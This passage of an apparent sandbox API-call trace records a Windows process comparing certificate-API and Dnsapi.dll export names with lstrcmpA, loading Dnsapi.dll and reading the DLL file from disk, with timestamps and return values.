(lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.112] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.113] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.113] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.113] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0156.113] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0156.113] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0156.113] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0156.113] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0156.123] GetProcessHeap () returned 0x4d0000 [0156.123] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4005040 | out: hHeap=0x4d0000) returned 1 [0156.132] GetProcessHeap () returned 0x4d0000 [0156.132] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e9290 [0156.133] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0156.219] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0156.219] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0156.219] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0156.219] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0156.219] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0156.219] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0156.219] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0156.219] GetProcessHeap () returned 0x4d0000 [0156.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xa7b88) returned 0x397d010 [0156.221] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.221] ReadFile (in: hFile=0x17c, lpBuffer=0x397d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x397d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0156.235] CloseHandle (hObject=0x17c) returned 1 [0156.235] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0156.236] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.236] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0156.236] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.236] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.236] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0156.236] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.236] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.236] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0156.236] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0156.236] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.236] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.236] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0156.236] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0156.236] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0156.236] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.236] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.236] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0156.236] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0156.236] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.236] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0156.236] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.236] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.237] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0156.237] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0156.237] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.237] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0156.237] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0156.237] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.237] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.237] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0156.237] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0156.237] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.237] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0156.237] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0156.237] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.237] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.238] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0156.238] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.239] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.240] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.241] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0156.241] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0156.241] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0156.241] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0156.241] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0156.241] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0156.241] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.241] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0156.242] 